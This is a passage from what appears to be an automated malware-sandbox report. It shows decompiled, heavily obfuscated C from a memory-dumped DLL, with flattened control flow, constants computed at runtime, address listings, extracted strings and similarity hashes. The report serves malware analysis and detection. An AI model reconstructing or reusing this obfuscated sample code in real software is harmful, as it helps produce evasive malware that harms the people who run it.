				_v144 = _v144 / _t556;
				_v144 = _v144 ^ 0x000b37e7;
				_v116 = 0x91be18;
				_v116 = _v116 + 0x1097;
				_v116 = _v116 ^ 0x0091575d;
				_v228 = 0x972824;
				_t557 = 0x43;
				_v228 = _v228 / _t557;
				_v228 = _v228 | 0xef3bbf37;
				_v228 = _v228 ^ 0xef317425;
				_v136 = 0xd8249a;
				_v136 = _v136 >> 0xb;
				_v136 = _v136 ^ 0x000e464d;
				_v124 = 0x5caff1;
				_v124 = _v124 << 6;
				_v124 = _v124 ^ 0x1725b7bf;
				_v128 = 0x9ae0bc;
				_v128 = _v128 + 0x4a06;
				_v128 = _v128 ^ 0x00910cbe;
				_v204 = 0x269c64;
				_v204 = _v204 >> 0xf;
				_v204 = _v204 ^ 0x93902d0d;
				_v204 = _v204 ^ 0x939cf77e;
				_v236 = 0x6e7cd0;
				_v236 = _v236 >> 2;
				_t558 = 0x24;
				_v236 = _v236 / _t558;
				_v236 = _v236 >> 0xb;
				_v236 = _v236 ^ 0x000d89ea;
				_v180 = 0x1f29a9;
				_v180 = _v180 | 0x3458364a;
				_v180 = _v180 ^ 0xb36b39a5;
				_v180 = _v180 ^ 0x8733a1e3;
				_v212 = 0x4a8439;
				_v212 = _v212 + 0xf522;
				_v212 = _v212 << 0xc;
				_v212 = _v212 ^ 0xb793fa51;
				_v156 = 0xf53287;
				_v156 = _v156 + 0xffffed23;
				_v156 = _v156 ^ 0x00fbc769;
				_v200 = 0x25992e;
				_t559 = 0x6d;
				_v200 = _v200 / _t559;
				_v200 = _v200 >> 0xa;
				_v200 = _v200 ^ 0x000ca5f7;
				_v112 = 0x508d06;
				_v112 = _v112 * 0xb;
				_v112 = _v112 ^ 0x037b8db7;
				_v224 = 0x6c6302;
				_v224 = _v224 + 0x2043;
				_v224 = _v224 | 0x24883d05;
				_v224 = _v224 << 0xb;
				_v224 = _v224 ^ 0x65f3cc77;
				_v160 = 0xd79e0a;
				_v160 = _v160 * 0xd;
				_v160 = _v160 * 0x50;
				_v160 = _v160 ^ 0x6bf5691e;
				_v168 = 0x8a1ef8;
				_v168 = _v168 + 0xffff9f94;
				_v168 = _v168 * 7;
				_v168 = _v168 ^ 0x03c22013;
				_v176 = 0x63fb71;
				_t560 = 0x2e;
				_t561 = _v100;
				_v176 = _v176 / _t560;
				_v176 = _v176 << 0xe;
				_v176 = _v176 ^ 0x8b1161f2;
				_v248 = 0xbeb2af;
				_v248 = _v248 + 0x93ff;
				_v248 = _v248 | 0xde7fbdff;
				_v248 = _v248 ^ 0xdeffffef;
				_v240 = 0x2957af;
				_v240 = _v240 + 0xfffff9c2;
				_v240 = _v240 | 0xa817302e;
				_v240 = _v240 + 0xffff8d44;
				_v240 = _v240 ^ 0xa83efe43;
				goto L1;
				do {
					while(1) {
						L1:
						_t567 = _t487 - 0xa04a468;
						if(_t567 > 0) {
							break;
						}
						if(_t567 == 0) {
							_t472 = E10021FA6(_v216, _v108, _v256,  &_v96, _v264,  &_v88);
							_t563 =  &(_t563[4]);
							asm("sbb ecx, ecx");
							_t487 = ( ~_t472 & 0xfdc6d7c1) + 0xeff3589;
							continue;
						}
						if(_t487 == 0x2e835c2) {
							_push( *_t542);
							_t473 = E100065BD( &_v32, _v272, _v188, _v164, _t487,  *((intOrPtr*)(_t542 + 4)), _v196);
							_t563 =  &(_t563[6]);
							if(_t473 == 0) {
								L22:
								return _t543;
							}
							_t487 = 0xa605609;
							continue;
						}
						if(_t487 == 0x30cc280) {
							_t544 =  *_t485;
							E1001E8DB(_v172, _v244, _v268, _v144, _t544);
							_t545 = _t544 + _v260;
							E100168F4(_v92, _t545, _v116, _v228, _v136, _v96, _v124);
							_t546 = _t545 + _v92;
							_t563 =  &(_t563[8]);
							_push(_t546);
							_push(_v204);
							E10010C2F(_t561, _v128);
							_t539 =  &(_t546[_t561]);
							_t502 = _t546;
							if(_t546 >= _t539) {
								L13:
								_t481 = E10017E33(0xe, 0);
								_t487 = 0x47fd419;
								 *((char*)(_t481 + _t546)) = 0;
								_t543 = _v104;
								continue;
							} else {
								goto L10;
							}
							do {
								L10:
								if(( *_t502 & 0x000000ff) == _v252) {
									 *_t502 = 0xc3;
								}
								_t502 =  &(_t502[1]);
							} while (_t502 < _t539);
							goto L13;
						}
						if(_t487 == 0x3cf250d) {
							_t487 = 0x2e835c2;
							continue;
						}
						if(_t487 != 0x47fd419) {
							goto L30;
						}
						E100088FC(_v212, _v156, _v200, _v112, _v96);
						_t563 =  &(_t563[3]);
						_t487 = 0xeff3589;
					}
					if(_t487 == 0xa605609) {
						_v68 = _v100;
						_v56 =  &_v32;
						_v64 =  *_t542;
						_v60 =  *((intOrPtr*)(_t542 + 4));
						_v52 = 0x20;
						_t458 = E10016015( &_v88, _v184, _v192,  &_v80, _v232);
						_t563 =  &(_t563[3]);
						if(_t458 == 0) {
							_t487 = 0xa3171d;
							goto L30;
						}
						_t487 = 0xa04a468;
						goto L1;
					}
					if(_t487 == 0xcc60d4a) {
						_t561 = E10017E33(_v240, _v248);
						 *((intOrPtr*)(_t485 + 4)) = _v132 + _t561 + _v92;
						_t487 = 0xdaae243;
						goto L1;
					}
					if(_t487 == 0xdaae243) {
						_push(_t487);
						_t469 = E100134E7(_t487,  *((intOrPtr*)(_t485 + 4)));
						_t563 =  &(_t563[3]);
						 *_t485 = _t469;
						if(_t469 == 0) {
							_t487 = 0x47fd419;
						} else {
							_t487 = 0x30cc280;
							_t543 = 1;
							_v104 = 1;
						}
						goto L1;
					}
					if(_t487 != 0xeff3589) {
						goto L30;
					}
					E100088FC(_v224, _v160, _v168, _v176, _v88);
					goto L22;
					L30:
				} while (_t487 != 0xa3171d);
				goto L22;
			}

0x1002103a
0x10021046
0x1002104d
0x1002104f
0x10021056
0x10021057
0x1002105e
0x1002105f
0x10021060
0x10021065
0x1002106d
0x10021070
0x1002107a
0x10021082
0x10021084
0x1002108c
0x10021091
0x10021099
0x100210a4
0x100210af
0x100210ba
0x100210c8
0x100210cd
0x100210d3
0x100210df
0x100210e4
0x100210ea
0x100210f2
0x100210fe
0x10021103
0x10021109
0x10021111
0x10021116
0x1002111e
0x1002112a
0x1002112f
0x10021135
0x1002113d
0x10021145
0x10021150
0x1002115b
0x10021162
0x1002116d
0x10021175
0x10021182
0x10021183
0x1002118a
0x1002118e
0x10021196
0x100211a4
0x100211a8
0x100211b0
0x100211b8
0x100211c0
0x100211c8
0x100211cd
0x100211d7
0x100211df
0x100211e7
0x100211ef
0x100211f7
0x100211ff
0x10021207
0x10021212
0x10021217
0x1002121d
0x10021225
0x10021230
0x10021238
0x10021243
0x10021250
0x10021253
0x10021257
0x1002125c
0x10021261
0x10021269
0x10021271
0x10021275
0x1002127d
0x10021282
0x1002128a
0x10021292
0x10021297
0x1002129f
0x100212a7
0x100212af
0x100212b4
0x100212bc
0x100212c4
0x100212cf
0x100212d7
0x100212e2
0x100212f5
0x100212fc
0x10021307
0x10021312
0x1002131d
0x10021324
0x1002132f
0x1002133a
0x10021345
0x10021350
0x10021358
0x10021360
0x10021368
0x10021370
0x10021378
0x1002137d
0x10021385
0x1002138d
0x10021395
0x100213a1
0x100213a6
0x100213ac
0x100213b9
0x100213ba
0x100213be
0x100213c6
0x100213da
0x100213e3
0x100213ee
0x100213f9
0x10021404
0x1002140f
0x1002141d
0x10021422
0x10021428
0x10021430
0x10021438
0x10021443
0x1002144b
0x10021456
0x10021461
0x10021469
0x10021474
0x1002147f
0x1002148a
0x10021495
0x1002149d
0x100214a2
0x100214aa
0x100214b2
0x100214ba
0x100214c3
0x100214c8
0x100214ce
0x100214d3
0x100214db
0x100214e3
0x100214eb
0x100214f3
0x100214fb
0x10021503
0x1002150b
0x10021510
0x10021518
0x10021523
0x1002152e
0x10021539
0x10021545
0x1002154a
0x1002154e
0x10021553
0x1002155b
0x1002156e
0x10021575
0x10021580
0x10021588
0x10021590
0x10021598
0x1002159d
0x100215a5
0x100215b8
0x100215c7
0x100215ce
0x100215d9
0x100215e1
0x100215ee
0x100215f2
0x100215fc
0x10021608
0x1002160b
0x10021612
0x10021616
0x1002161b
0x10021623
0x1002162b
0x10021633
0x1002163b
0x10021643
0x1002164b
0x10021653
0x1002165b
0x10021663
0x10021663
0x1002166b
0x1002166b
0x1002166b
0x1002166b
0x10021671
0x00000000
0x00000000
0x10021677
0x100217eb
0x100217f0
0x100217f7
0x100217ff
0x00000000
0x100217ff
0x10021683
0x1002178e
0x100217ae
0x100217b3
0x100217b8
0x1002185c
0x10021867
0x10021867
0x100217be
0x00000000
0x100217be
0x1002168f
0x100216d8
0x100216f1
0x100216fd
0x10021728
0x1002172d
0x10021734
0x10021739
0x1002173a
0x10021745
0x1002174b
0x1002174f
0x10021753
0x10021766
0x10021772
0x10021779
0x1002177e
0x10021782
0x00000000
0x00000000
0x00000000
0x00000000
0x10021755
0x10021755
0x1002175c
0x1002175e
0x1002175e
0x10021761
0x10021762
0x00000000
0x10021755
0x10021697
0x100216d1
0x00000000
0x100216d1
0x1002169f
0x00000000
0x00000000
0x100216c2
0x100216c7
0x100216ca
0x100216ca
0x10021810
0x100218fd
0x1002190b
0x10021914
0x1002191e
0x10021935
0x10021940
0x10021945
0x1002194a
0x10021956
0x00000000
0x10021956
0x1002194c
0x00000000
0x1002194c
0x1002181c
0x100218ca
0x100218de
0x100218e1
0x00000000
0x100218e1
0x10021828
0x10021884
0x10021889
0x1002188e
0x10021891
0x10021895
0x100218ab
0x10021897
0x10021899
0x1002189e
0x1002189f
0x1002189f
0x00000000
0x10021895
0x10021830
0x00000000
0x00000000
0x10021853
0x00000000
0x1002195b
0x1002195b
0x00000000

Strings

J6X4, xrefs: 100214E3
ys), xrefs: 10021065
V`, xrefs: 100217BE
V`, xrefs: 1002180A
%t1, xrefs: 10021430
P, xrefs: 10021150
9\K, xrefs: 10021312
.v9, xrefs: 10021238
, xrefs: 10021935
C , xrefs: 10021588
~, xrefs: 100210D3

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: V`$V`$ $%t1$9\K$C $J6X4$ys)$.v9$P$~
API String ID: 0-1710882718
Opcode ID: 1600ddd9710fb38e57b510302d365a82e9dd85bfb3af28b0f6d4b9299358c688
Instruction ID: 6bf0752f24a2d35b8dcde8c726dd9112bbc8e479d8331053264db072a28da76b
Opcode Fuzzy Hash: 1600ddd9710fb38e57b510302d365a82e9dd85bfb3af28b0f6d4b9299358c688
Instruction Fuzzy Hash: E4222275508380CFD364CF25C88AA8BBBE2FBD4758F50891DE6DA86260D7B19948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 100227CB, Relevance: 12.8, Strings: 10, Instructions: 315
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E100227CB() {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				unsigned int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				void* _t346;
				void* _t351;
				intOrPtr _t356;
				signed int _t362;
				void* _t372;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				signed int _t379;
				signed int _t380;
				signed int _t382;
				intOrPtr _t403;
				void* _t411;
				signed int* _t415;

				_t415 =  &_v152;
				_v32 = 0x509c26;
				_v32 = _v32 + 0x3ebb;
				_v32 = _v32 ^ 0x0050dae1;
				_v16 = 0xd89773;
				_v16 = _v16 | 0x557ca088;
				_v16 = _v16 ^ 0x55fcb7fb;
				_v144 = 0x62e0d4;
				_v144 = _v144 + 0xffff41f9;
				_v144 = _v144 + 0xffff44eb;
				_v144 = _v144 + 0xd059;
				_v144 = _v144 ^ 0x00623811;
				_v112 = 0x976afe;
				_t374 = 5;
				_v112 = _v112 / _t374;
				_t372 = 0;
				_t375 = 0x6e;
				_t411 = 0x6cfa09e;
				_v112 = _v112 * 0x4f;
				_v112 = _v112 ^ 0x09586737;
				_v72 = 0x7eab97;
				_v72 = _v72 << 4;
				_v72 = _v72 | 0xaf496e07;
				_v72 = _v72 ^ 0xafebff77;
				_v92 = 0x575025;
				_v92 = _v92 + 0xe16c;
				_v92 = _v92 >> 4;
				_v92 = _v92 ^ 0x000ac8c7;
				_v84 = 0x18d11c;
				_v84 = _v84 + 0xdb6c;
				_v84 = _v84 ^ 0x4872fcd7;
				_v84 = _v84 ^ 0x486c65ba;
				_v124 = 0x708bdb;
				_v124 = _v124 + 0xa6ba;
				_v124 = _v124 / _t375;
				_t376 = 0x39;
				_v124 = _v124 * 0x2f;
				_v124 = _v124 ^ 0x0035eaa7;
				_v140 = 0x602137;
				_t66 =  &_v140; // 0x602137
				_v140 =  *_t66 / _t376;
				_v140 = _v140 | 0x322f3f5d;
				_v140 = _v140 ^ 0x4bcd3ccf;
				_v140 = _v140 ^ 0x79e6354e;
				_v64 = 0x974509;
				_v64 = _v64 | 0x8f3511c5;
				_v64 = _v64 ^ 0x8fbb2d73;
				_v8 = 0x5063d7;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x06388dd5;
				_v40 = 0x236208;
				_v40 = _v40 + 0x4cf;
				_v40 = _v40 ^ 0x0020a294;
				_v152 = 0x694433;
				_v152 = _v152 + 0xffff8ca9;
				_t377 = 0x70;
				_v152 = _v152 / _t377;
				_v152 = _v152 + 0xffff998a;
				_v152 = _v152 ^ 0x00042e4c;
				_v148 = 0x5caac2;
				_t378 = 0x5e;
				_v148 = _v148 / _t378;
				_v148 = _v148 ^ 0x1e8959a6;
				_v148 = _v148 + 0xffff31a7;
				_v148 = _v148 ^ 0x1e85120c;
				_v76 = 0x9a35d8;
				_v76 = _v76 + 0xffff9e86;
				_v76 = _v76 + 0xffff2a11;
				_v76 = _v76 ^ 0x0092fce7;
				_v108 = 0xf7582c;
				_v108 = _v108 << 9;
				_t129 =  &_v108; // 0x9
				_t379 = 0x51;
				_v108 =  *_t129 / _t379;
				_v108 = _v108 ^ 0x02fe01ec;
				_v88 = 0xcc84cb;
				_v88 = _v88 | 0xee47a0ff;
				_v88 = _v88 >> 0xf;
				_v88 = _v88 ^ 0x000b67f5;
				_v68 = 0x864d3c;
				_v68 = _v68 ^ 0xecf693e9;
				_v68 = _v68 ^ 0xec7e7604;
				_v56 = 0xb4741a;
				_v56 = _v56 + 0x6a5a;
				_v56 = _v56 ^ 0x00b1ae39;
				_v100 = 0xd913fd;
				_v100 = _v100 | 0xce1fc98f;
				_v100 = _v100 << 0xf;
				_v100 = _v100 ^ 0xedf9186f;
				_v24 = 0x664084;
				_v24 = _v24 ^ 0x4d25f2e1;
				_v24 = _v24 ^ 0x4d49c74d;
				_v48 = 0x9a628f;
				_v48 = _v48 >> 0xe;
				_v48 = _v48 ^ 0x0004e874;
				_v132 = 0xa1379;
				_v132 = _v132 << 0xc;
				_v132 = _v132 << 7;
				_v132 = _v132 | 0x98e1d7a9;
				_v132 = _v132 ^ 0x9be3ad18;
				_v44 = 0xb66be2;
				_v44 = _v44 << 0xa;
				_v44 = _v44 ^ 0xd9a0ad2b;
				_v136 = 0x6f53ea;
				_t186 =  &_v136; // 0x6f53ea
				_v136 =  *_t186 * 0x5b;
				_v136 = _v136 + 0x864e;
				_v136 = _v136 << 3;
				_v136 = _v136 ^ 0x3c9d97ad;
				_v52 = 0xe36994;
				_v52 = _v52 | 0x018016fa;
				_v52 = _v52 ^ 0x01e9084d;
				_v60 = 0xa3a32e;
				_v60 = _v60 + 0xffff1ef7;
				_v60 = _v60 ^ 0x00a8def1;
				_v120 = 0x2a96c5;
				_v120 = _v120 + 0x9ee3;
				_v120 = _v120 + 0xbb16;
				_v120 = _v120 << 9;
				_v120 = _v120 ^ 0x57e59406;
				_v128 = 0x43fcf4;
				_v128 = _v128 ^ 0xfdbd2c8f;
				_v128 = _v128 * 0x4a;
				_v128 = _v128 << 4;
				_v128 = _v128 ^ 0xba80786a;
				_v28 = 0xa32393;
				_v28 = _v28 | 0x67372036;
				_v28 = _v28 ^ 0x67bb83b1;
				_v96 = 0x66eb04;
				_v96 = _v96 + 0xa8da;
				_v96 = _v96 + 0x329;
				_v96 = _v96 ^ 0x006db361;
				_v104 = 0xf2d134;
				_t380 = 0x17;
				_v104 = _v104 / _t380;
				_v104 = _v104 * 0x31;
				_v104 = _v104 ^ 0x02063cb1;
				_v36 = 0xbddc0f;
				_v36 = _v36 * 0x1f;
				_v36 = _v36 ^ 0x16f784ad;
				_v80 = 0x456529;
				_v80 = _v80 >> 0xc;
				_v80 = _v80 >> 2;
				_v80 = _v80 ^ 0x000ff5a5;
				_v116 = 0xf00a60;
				_v116 = _v116 ^ 0x4bc8002d;
				_v116 = _v116 << 0xa;
				_v116 = _v116 ^ 0xe020b48c;
				_v12 = 0x949884;
				_v12 = _v12 * 0xf;
				_v12 = _v12 ^ 0x08b85995;
				_v20 = 0x421b1b;
				_v20 = _v20 * 0x4f;
				_v20 = _v20 ^ 0x146a18c9;
				while(1) {
					L1:
					_t403 =  *0x10025224;
					while(1) {
						_t346 = 0x5ab7083;
						do {
							L3:
							if(_t411 == 0x2ed030e) {
								E100088FC(_v28, _v96, _v104, _v36,  *(_t403 + 0x18));
								_t382 = _v80;
								E100088FC(_t382, _v116, _v12, _v20,  *0x10025224);
								_t415 =  &(_t415[6]);
								_t411 = 0xecf6d61;
								L16:
								_t403 =  *0x10025224;
								_t346 = 0x5ab7083;
								goto L17;
							}
							if(_t411 == _t346) {
								_t382 = _v44;
								_t351 = E1000470C(_t382, _v136,  *((intOrPtr*)( *0x10025224 + 0x18)), _v144, _v4,  *((intOrPtr*)( *0x10025224 + 0x1c)), _v52, _v60);
								_t415 =  &(_t415[6]);
								if(_t351 != _v112) {
									_t411 = 0x2ed030e;
								} else {
									_t411 = 0xaa4f62d;
									_t372 = 1;
								}
								goto L1;
							}
							if(_t411 == 0x6cfa09e) {
								_push(_t382);
								_t356 = E100134E7(_t382, 0x48);
								 *0x10025224 = _t356;
								 *((intOrPtr*)(_t356 + 0x1c)) = 0x4000;
								_t362 = E100134E7(_t382,  *((intOrPtr*)( *0x10025224 + 0x1c)));
								_t403 =  *0x10025224;
								_t382 = _t362;
								_t415 =  &(_t415[5]);
								_t411 = 0x7d046a4;
								 *(_t403 + 0x18) = _t382;
								 *(_t403 + 0x3c) = _t382;
								 *(_t403 + 4) = _t382;
								 *((intOrPtr*)(_t403 + 0x2c)) =  *((intOrPtr*)(_t403 + 0x1c)) + _t382;
								_t346 = 0x5ab7083;
								continue;
							}
							if(_t411 == 0x7d046a4) {
								_push(_v88);
								_push(_v108);
								_push(_v76);
								E1001E1AC(_v68,  &_v4, _v32, E1000416C(_v148, 0x10001294), _v56, _v100, 0);
								_t382 = _v24;
								_t411 =  ==  ? 0x5ab7083 : 0x2ed030e;
								E1000B952(_t382, _t365, _v48, _v132);
								_t415 =  &(_t415[0xa]);
								goto L16;
							}
							if(_t411 != 0xaa4f62d) {
								goto L17;
							}
							E1000C1CB(_v120, _v4, _v72, _v128);
							L9:
							return _t372;
							L17:
						} while (_t411 != 0xecf6d61);
						goto L9;
					}
				}
			}

0x100227cb
0x100227d1
0x100227db
0x100227e3
0x100227eb
0x100227f6
0x10022801
0x1002280c
0x10022814
0x1002281c
0x10022824
0x1002282c
0x10022834
0x10022846
0x1002284b
0x10022856
0x10022858
0x1002285b
0x10022860
0x10022864
0x1002286c
0x10022874
0x10022879
0x10022881
0x10022889
0x10022891
0x10022899
0x1002289e
0x100228a6
0x100228ae
0x100228b6
0x100228be
0x100228c6
0x100228ce
0x100228de
0x100228e7
0x100228ea
0x100228ee
0x100228f6
0x100228fe
0x10022906
0x1002290a
0x10022912
0x1002291a
0x10022922
0x1002292a
0x10022932
0x1002293a
0x10022945
0x1002294d
0x10022958
0x10022963
0x1002296e
0x10022979
0x10022981
0x1002298d
0x10022990
0x10022994
0x1002299c
0x100229a4
0x100229b4
0x100229b9
0x100229bf
0x100229c7
0x100229cf
0x100229d7
0x100229df
0x100229e7
0x100229ef
0x100229f7
0x100229ff
0x10022a04
0x10022a08
0x10022a0b
0x10022a0f
0x10022a17
0x10022a1f
0x10022a27
0x10022a2c
0x10022a34
0x10022a3c
0x10022a44
0x10022a4c
0x10022a54
0x10022a5c
0x10022a64
0x10022a6c
0x10022a74
0x10022a79
0x10022a81
0x10022a8c
0x10022a97
0x10022aa2
0x10022aaa
0x10022aaf
0x10022ab7
0x10022abf
0x10022ac4
0x10022ac9
0x10022ad1
0x10022ad9
0x10022ae1
0x10022ae6
0x10022aee
0x10022af6
0x10022afb
0x10022aff
0x10022b07
0x10022b0c
0x10022b14
0x10022b1c
0x10022b24
0x10022b2c
0x10022b34
0x10022b3c
0x10022b44
0x10022b4c
0x10022b54
0x10022b5c
0x10022b61
0x10022b69
0x10022b71
0x10022b7e
0x10022b82
0x10022b87
0x10022b8f
0x10022b9a
0x10022ba5
0x10022bb0
0x10022bb8
0x10022bc0
0x10022bc8
0x10022bd0
0x10022be5
0x10022be8
0x10022bf1
0x10022bf5
0x10022bfd
0x10022c10
0x10022c17
0x10022c22
0x10022c2a
0x10022c2f
0x10022c34
0x10022c3c
0x10022c44
0x10022c4c
0x10022c51
0x10022c59
0x10022c6c
0x10022c73
0x10022c7e
0x10022c91
0x10022c98
0x10022ca3
0x10022ca3
0x10022ca3
0x10022ca9
0x10022ca9
0x10022cae
0x10022cae
0x10022cb0
0x10022e5a
0x10022e77
0x10022e7b
0x10022e80
0x10022e83
0x10022e88
0x10022e88
0x10022e8e
0x00000000
0x10022e8e
0x10022cb8
0x10022e15
0x10022e1f
0x10022e24
0x10022e2b
0x10022e3a
0x10022e2d
0x10022e2f
0x10022e34
0x10022e34
0x00000000
0x10022e2b
0x10022cc4
0x10022d8f
0x10022d93
0x10022d98
0x10022da0
0x10022dc6
0x10022dcb
0x10022dd1
0x10022dd3
0x10022dd6
0x10022de0
0x10022de3
0x10022de6
0x10022de9
0x10022ca9
0x00000000
0x10022ca9
0x10022cd0
0x10022d05
0x10022d0e
0x10022d12
0x10022d44
0x10022d68
0x10022d6f
0x10022d72
0x10022d77
0x00000000
0x10022d77
0x10022cd8
0x00000000
0x00000000
0x10022cf1
0x10022cfb
0x10022d04
0x10022e93
0x10022e93
0x00000000
0x10022e9f
0x10022ca9

Strings

%PW, xrefs: 10022889
3Di, xrefs: 10022979
Zj, xrefs: 10022A54
-, xrefs: 10022C44
7gX, xrefs: 10022A04
l, xrefs: 10022891
7gX, xrefs: 10022864
)eE, xrefs: 10022C22
6 7g, xrefs: 10022B9A
7!`, xrefs: 100228FE

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: 7gX$%PW$)eE$-$3Di$6 7g$7!`$7gX$Zj$l
API String ID: 0-4245088159
Opcode ID: a9319e32f20ac7a69b8354a4155d39d4c743d9caac352ca85dd9fabee3b1612a
Instruction ID: 9fd8f9b3bf63c0fa2b7c1806c3475a6c67d676f5ecad9025fe6794436de77fb7
Opcode Fuzzy Hash: a9319e32f20ac7a69b8354a4155d39d4c743d9caac352ca85dd9fabee3b1612a
Instruction Fuzzy Hash: CEF132715083809FD3A8CF25D589A4FFBE2FBC4748F508A1DF6898A260C7B58949CF46

Uniqueness

Uniqueness Score: -1.00%

Function 1002196C, Relevance: 11.5, Strings: 9, Instructions: 291
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E1002196C() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				intOrPtr _t309;
				signed int _t314;
				void* _t324;
				void* _t325;
				char _t326;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				void* _t363;

				_v680 = 0xa2f7aa;
				_t325 = 0x753c325;
				_v680 = _v680 * 0x4c;
				_t324 = 0;
				_v680 = _v680 >> 3;
				_v680 = _v680 << 4;
				_v680 = _v680 ^ 0x60c30cf1;
				_v696 = 0xa4011b;
				_v696 = _v696 | 0x3281ffd4;
				_t356 = 0x43;
				_v696 = _v696 * 0x4c;
				_v696 = _v696 << 2;
				_v696 = _v696 ^ 0x251fd9d0;
				_v632 = 0x368072;
				_v632 = _v632 ^ 0xe664f928;
				_v632 = _v632 + 0xffff2db5;
				_v632 = _v632 ^ 0xe651a70c;
				_v620 = 0x322706;
				_v620 = _v620 + 0xffff0d16;
				_v620 = _v620 + 0xffff7d35;
				_v620 = _v620 ^ 0x0030b151;
				_v616 = 0x84cd4d;
				_v616 = _v616 ^ 0x8a6bd0b3;
				_v616 = _v616 << 0xf;
				_v616 = _v616 ^ 0x8ef53815;
				_v672 = 0x638468;
				_v672 = _v672 >> 0xa;
				_v672 = _v672 / _t356;
				_t357 = 0x31;
				_v672 = _v672 / _t357;
				_v672 = _v672 ^ 0x000648b5;
				_v624 = 0x71ec42;
				_t58 =  &_v624; // 0x71ec42
				_t358 = 0x21;
				_v624 =  *_t58 * 0xb;
				_v624 = _v624 + 0xffff89f5;
				_v624 = _v624 ^ 0x04e4bd63;
				_v588 = 0xa5955;
				_v588 = _v588 | 0xe2a93ad1;
				_v588 = _v588 ^ 0xe2ab3956;
				_v604 = 0x5a8e73;
				_v604 = _v604 * 0x6a;
				_v604 = _v604 ^ 0x25752f12;
				_v652 = 0x901a0d;
				_v652 = _v652 + 0xffffd26b;
				_v652 = _v652 << 6;
				_v652 = _v652 ^ 0x23fbaee3;
				_v576 = 0x36e476;
				_v576 = _v576 ^ 0xe2ceddc7;
				_v576 = _v576 ^ 0xe2f950f2;
				_v664 = 0x6e5e59;
				_v664 = _v664 >> 0xc;
				_v664 = _v664 | 0xae582621;
				_v664 = _v664 * 6;
				_v664 = _v664 ^ 0x1610521e;
				_v628 = 0x872b33;
				_v628 = _v628 / _t358;
				_v628 = _v628 << 0xb;
				_v628 = _v628 ^ 0x20c40b84;
				_v644 = 0x6da02d;
				_v644 = _v644 + 0x4571;
				_v644 = _v644 >> 0xb;
				_v644 = _v644 ^ 0x00022d15;
				_v636 = 0xfef451;
				_v636 = _v636 + 0x79b7;
				_v636 = _v636 + 0xffff0f2a;
				_v636 = _v636 ^ 0x00f38063;
				_v592 = 0x37868a;
				_v592 = _v592 | 0x9e108e32;
				_v592 = _v592 ^ 0x9e38bf07;
				_v688 = 0x69b909;
				_v688 = _v688 >> 0x10;
				_v688 = _v688 >> 0xb;
				_v688 = _v688 + 0xffff7c7d;
				_v688 = _v688 ^ 0xfff29853;
				_v584 = 0x4bfe3;
				_t359 = 0x1d;
				_v584 = _v584 * 0x56;
				_v584 = _v584 ^ 0x019724aa;
				_v684 = 0xddc312;
				_v684 = _v684 * 0x59;
				_v684 = _v684 | 0x90b7d03c;
				_v684 = _v684 ^ 0x8b4eaf91;
				_v684 = _v684 ^ 0x56f6393d;
				_v692 = 0x56504c;
				_v692 = _v692 + 0x20c3;
				_v692 = _v692 >> 0xe;
				_v692 = _v692 << 2;
				_v692 = _v692 ^ 0x0002b8e1;
				_v580 = 0x1b8be8;
				_v580 = _v580 ^ 0x9a57f52e;
				_v580 = _v580 ^ 0x9a4a9616;
				_v640 = 0x3e5cb8;
				_v640 = _v640 | 0x88a2de43;
				_v640 = _v640 / _t359;
				_v640 = _v640 ^ 0x04b0830f;
				_v648 = 0x8b0406;
				_t360 = 0x71;
				_v648 = _v648 / _t360;
				_v648 = _v648 ^ 0xe2529749;
				_v648 = _v648 ^ 0xe252b136;
				_v656 = 0x714cf4;
				_v656 = _v656 ^ 0x49afbced;
				_v656 = _v656 ^ 0x927e2cae;
				_v656 = _v656 ^ 0xdba1ebf4;
				_v668 = 0x21594d;
				_v668 = _v668 ^ 0x100fe3b8;
				_v668 = _v668 << 0xa;
				_v668 = _v668 ^ 0xc0e75785;
				_v668 = _v668 ^ 0x7a0aaac9;
				_v676 = 0x52a7e4;
				_v676 = _v676 >> 0xd;
				_v676 = _v676 | 0x4d880339;
				_v676 = _v676 ^ 0x15565bd3;
				_v676 = _v676 ^ 0x58d7a809;
				_v600 = 0x3b2af5;
				_v600 = _v600 | 0xae420809;
				_v600 = _v600 ^ 0xae72ea32;
				_v612 = 0x597ebe;
				_v612 = _v612 * 0x75;
				_v612 = _v612 | 0xe9198bb4;
				_v612 = _v612 ^ 0xe9f6aa0e;
				_v608 = 0x2ff72f;
				_v608 = _v608 >> 8;
				_v608 = _v608 ^ 0x0007c746;
				_v596 = 0x29a1fc;
				_v596 = _v596 ^ 0x79cee4c4;
